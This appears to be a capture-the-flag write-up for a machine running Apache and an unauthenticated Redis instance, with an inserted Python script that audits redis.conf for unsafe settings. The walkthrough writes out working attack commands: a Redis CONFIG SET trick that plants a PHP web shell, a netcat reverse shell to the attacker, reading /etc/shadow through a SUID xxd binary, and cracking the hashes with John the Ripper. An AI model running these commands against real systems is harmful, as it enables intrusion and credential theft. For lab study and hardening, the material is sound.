Nmap Results:

Nmap scan report for
Host is up (0.053s latency).

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open  redis   Redis key-value store 6.0.7

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sat Oct  3 08:38:25 2020 -- 1 IP address (1 host up) scanned in 8.74 seconds

So here we can see two open ports: 80, which serves the default Apache page, and 6379, which is Redis. It took me a while to figure it out for some reason, but it is the Redis CLI, so we can look up ways to hijack it or use this Redis CLI to exploit the box and maybe get a reverse shell back, or use it for further enumeration.

An article we can use for this is: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#basic-information

To exploit this Redis CLI and get a reverse shell back:

nc <IP OF TARGET> 6379
config set dbfilename cmdshell.php
set test "<?php system($_GET['c']); ?>"

Then we will have RCE: we can browse to the page we just created and use it to get a reverse shell back to us, like this:

http://<IP>/cmdshell.php?c=nc -e /bin/bash <Your IP> <Your Port>
rlwrap nc -nvlp <Your Port> # On your local machine
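The write primitive used above works because CONFIG SET dir/dbfilename is reachable without a password. As an added defensive check (not part of this writeup), the following Python auditor parses a redis.conf and flags the settings that make that possible; both sample configs are constructed, and the hardened one uses rename-command, which Redis 6 users may replace with ACLs.

```python
def parse_redis_conf(text):
    """Return {directive: [values...]} from redis.conf text, skipping comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        val = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(val)
    return conf


def audit_redis_conf(text):
    """Flag settings that let an unauthenticated client write files via CONFIG SET."""
    conf = parse_redis_conf(text)
    findings = []
    # A missing bind directive means Redis listens on every interface.
    binds = conf.get("bind", [""])
    if any(b == "" or "0.0.0.0" in b or "*" in b for b in binds):
        findings.append("bind: listening on all interfaces")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")
    if "requirepass" not in conf or conf["requirepass"][-1].strip('"') == "":
        findings.append("requirepass: no password set")
    # rename-command CONFIG "" removes the dir/dbfilename write primitive.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG still reachable (dir/dbfilename writable)")
    for d in conf.get("dir", []):
        if d.startswith("/var/www"):
            findings.append(f"dir: RDB dump directory is a web root ({d})")
    return findings


# Constructed sample: the kind of exposure the scan above found.
WEAK_CONF = """
port 6379
protected-mode no
bind 0.0.0.0
dir /var/www/html
"""

# Constructed sample: the same instance with the relevant controls in place.
HARDENED_CONF = """
port 6379
bind 127.0.0.1 ::1
protected-mode yes
requirepass "CHANGE-ME-long-random-secret"
rename-command CONFIG ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or ["no findings"])
```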

After we get our shell back, let's enumerate further to get root privileges. For this we will look at SUID binaries and the output of sudo -l. After looking at these we see an interesting SUID binary, xxd, which lets us read files as root, so the best idea here is to read /etc/shadow:

/usr/bin/xxd /etc/shadow | /usr/bin/xxd -r 

Then we put the last hash into john and crack it. When we use this password to switch user and run sudo -l, we see we can run all commands as root, so a simple sudo su makes us root and gg. Command for John:

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Some common hash-cracking formats:

To crack shadow files:

In this case we can also use a John the Ripper utility script called unshadow, like this:

unshadow [path to passwd] [path to shadow] > shadowfile 

Then we can run john on the shadowfile output by unshadow:

john shadowfile --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt